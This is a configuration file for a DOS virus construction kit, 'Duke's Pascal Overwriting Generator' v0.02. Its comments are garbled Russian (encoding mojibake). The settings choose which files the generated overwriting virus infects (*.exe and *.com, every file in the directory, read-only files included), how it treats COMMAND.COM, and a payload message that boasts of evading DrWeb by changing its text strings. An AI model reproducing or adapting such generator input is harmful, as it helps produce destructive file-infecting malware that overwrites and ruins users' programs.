   ;Š®ä¨£ãà æ¨®ë© ä ©« ¤«ï Duke's Pascal Overwriting Generator (DPOG) v0.02
   ;==========================================================================
   ;€¢â®à ¢¨àãá 
   A=Duke/SMF
   ;ˆ¬ï á®§¤ ¢ ¥¬®£® ¢¨àãá 
   B=DPOG Demo Virus
   ;‚ ª ª®© ä ©« § ¯¨á âì ¨áå®¤ë© â¥ªáâ ¢¨àãá 
   C=sample.pas
   ;’¨¯ ¯®à ¦ ¥¬ëå ä ©«®¢:
   ;D=E - ¯®à ¦ âì *.exe
   ;D=C - ¯®à ¦ âì *.com
   ;D=B - both (â.¥. ¯®à ¦ âì ¨ *.exe, ¨ *.com)
   D=B
   ;‘ª®«ìª® ä ©«®¢ ¯®à ¦ âì §  ®¤¨ § ¯ãáª
   ;E=0 - ¢á¥ ä ©«ë â¥ªãé¥£® ª â «®£ 
   E=0
   ;*®à ¦¥¨¥ Read-Only (â®«ìª® ¤«ï çâ¥¨ï) ä ©«®¢
   ;G=Y - „ , ¯®à ¦ âì Read-Only ä ©«ë
   ;G=N - *¥â, ¥ ¯®à ¦ âì
   G=Y
   ;ˆá¯®«ì§®¢ âì COMMAND.COM ¤«ï § à ¦¥¨ï
   ;H=Y - „ , ¨á¯®«ì§®¢ âì COMMAND.COM
   ;H=N - *¥â, ¨á¯®«ì§®¢ âì á®¡áâ¢¥ë¥ ¯à®æ¥¤ãàë
   H=N
   ;*à®¢¥àïâì ¨ ¥ § à ¦ âì COMMAND.COM
   ;ˆá¯®«ì§ã¥âáï ¯à¨ D=C ¨«¨ D=B
   ;I=Y - *¥ § à ¦ âì COMMAND.COM
   ;I=N - ‡ à ¦ âì ä ©«ë ¡¥§ ¯à®¢¥àª¨
   I=Y
   ;‚ë¢®¤   íªà  â¥ªáâ®¢ëå áâà®ª ¢ ª®æ¥ à ¡®âë ¢¨àãá .
   ;…á«¨ ®áâ ¢¨âì áâà®çªã ¯ãáâ®©, â® ¨ç¥£® ¥ ¢ë¢®¤¨âáï.
   ;—¨á«® áâà®ç¥ª ¥ ¤®«¦® ¯à¥¢ëè âì 25.
   J=Hahaha ! This is DPOG v0.02 demo virus.
   J=Why not detected with DrWeb ??? Coz i change text string !
   J=Again created (c) by Duke/SMF. Who else ? ;-))
   ;*®¤ª«îç¥¨¥ ä ©«  á® á¯¥æíää¥ªâ ¬¨.
   ;Š ¢¨àãáã ¬®£ãâ ¯®¤ª«îç âìáï â®«ìª® ¯à®æ¥¤ãàë, ®ä®à¬«¥ë¥ ¢ ¢¨¤¥:
   ;    procedure ¨¬ï_¯à®æ¥¤ãàë;{¡¥§ ¯ à ¬¥âà®¢}
   ;    begin
   ;    {........}
   ;    end;
   ;…á«¨ ¯à®æ¥¤ãà¥ âà¥¡ãîâáï ¤àã£¨¥ ¬®¤ã«¨, ¯®¬¨¬® dos.tpu, â® ¨å  ¤®
   ;¯®¤ª«îç¨âì ¢ ¯à®æ¥¤ãà¥.
   ;”®à¬ â § ¯¨á¨: K=¨¬ï_ä ©« #¨¬ï_¯à®æ¥¤ãàë
   K=
   ;Ž¯â¨¬¨§ æ¨ï ª®¤  ¢¨àãá 
   ;L=Y - ˆá¯®«ì§ãîâáï ¤¨à¥ªâ¨¢ë, ã¬¥ìè îé¨¥ à §¬¥à â¥«  ¢¨àãá 
   ;L=N - Š®¤ ¥ ®¯â¨¬¨§¨àã¥âáï
   L=Y
   ;---------------- Š®¥æ ª®ä¨£ãà æ¨®®£® ä ©«  -------------------------
